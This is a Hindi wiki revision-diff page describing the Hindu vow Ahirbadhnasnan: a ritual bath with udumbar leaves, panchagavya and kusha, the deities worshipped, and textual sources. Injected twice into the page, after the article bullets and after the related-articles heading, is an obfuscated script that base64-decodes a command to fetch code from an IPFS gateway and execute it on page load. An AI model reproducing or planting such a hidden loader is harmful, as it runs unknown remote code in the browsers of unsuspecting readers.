Difference between revisions of "अहिर्बध्नस्नान"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "ref>(" to "ref>")
m (Text replace - ")</ref" to "</ref")
 
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
*पूर्वा [[भाद्रपद]]-[[नक्षत्र]] में व्रत करने वाले को उदुम्बर की पत्तियों, [[पंचगव्य]], [[कुश]], [[चन्दन]] आदि से युक्त दो घड़ों के जल में स्नान करना होता है।<ref>हेमाद्रि (व्रत खण्ड 2, 654-655, [[विष्णु पुराण|विष्णुधर्मोत्तर पुराण]] से उद्धरण)</ref>
+
*पूर्वा [[भाद्रपद]]-[[नक्षत्र]] में व्रत करने वाले को उदुम्बर की पत्तियों, [[पंचगव्य]], [[कुश]], [[चन्दन]] आदि से युक्त दो घड़ों के जल में स्नान करना होता है।<ref>हेमाद्रि (व्रत खण्ड 2, 654-655, [[विष्णु पुराण|विष्णुधर्मोत्तर पुराण]] से उद्धरण</ref>
 
*अहिर्बध्नस्नान व्रत में अहिर्ब्रध्न, [[सूर्य देव|सूर्य]], [[वरुण देवता|वरुण]], [[चंद्र देवता|चन्द्र]], [[रुद्र]] एवं [[विष्णु]] की पूजा होती है।  
 
*अहिर्बध्नस्नान व्रत में अहिर्ब्रध्न, [[सूर्य देव|सूर्य]], [[वरुण देवता|वरुण]], [[चंद्र देवता|चन्द्र]], [[रुद्र]] एवं [[विष्णु]] की पूजा होती है।  
*बृहत्संहिता<ref>बृहत्संहिता 97|5)</ref>, [[भविष्योत्तर पुराण]]<ref>भविष्योत्तरपुराण हेमाद्रि व्रत खण्ड 2, 596 एवं कृत्यरत्नाकर 560)</ref> के मत से उत्तराभाद्रपदा के देवता हैं अहिर्बुध्न्य।  
+
*बृहत्संहिता<ref>बृहत्संहिता 97|5</ref>, [[भविष्योत्तर पुराण]]<ref>भविष्योत्तरपुराण हेमाद्रि व्रत खण्ड 2, 596 एवं कृत्यरत्नाकर 560</ref> के मत से उत्तराभाद्रपदा के देवता हैं अहिर्बुध्न्य।  
 
*अहिर्बध्न स्नान से सहस्रों [[गाय|गायों]] एवं सर्वोत्तम समृद्धि की प्राप्ति होती है।  
 
*अहिर्बध्न स्नान से सहस्रों [[गाय|गायों]] एवं सर्वोत्तम समृद्धि की प्राप्ति होती है।  
 
*'अहिर्बुध्न्य' शब्द प्राचीन एवं शुद्ध है।  
 
*'अहिर्बुध्न्य' शब्द प्राचीन एवं शुद्ध है।  

Latest revision as of 12:39, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • poorva bhadrapad-nakshatr mean vrat karane vale ko udumbar ki pattiyoan, panchagavy, kush, chandan adi se yukt do gh doan ke jal mean snan karana hota hai.[1]
  • ahirbadhnasnan vrat mean ahirbradhn, soory, varun, chandr, rudr evan vishnu ki pooja hoti hai.
  • brihatsanhita[2], bhavishyottar puran[3] ke mat se uttarabhadrapada ke devata haian ahirbudhny.
  • ahirbadhn snan se sahasroan gayoan evan sarvottam samriddhi ki prapti hoti hai.
  • 'ahirbudhny' shabd prachin evan shuddh hai.
  • aisi manyata hai ki ahirbadhnasnan agni ka dyotak hai.[4]

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. hemadri (vrat khand 2, 654-655, vishnudharmottar puran se uddharan
  2. brihatsanhita 97|5
  3. bhavishyottarapuran hemadri vrat khand 2, 596 evan krityaratnakar 560
  4. rrigved 1|186|5, 2|31|6

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>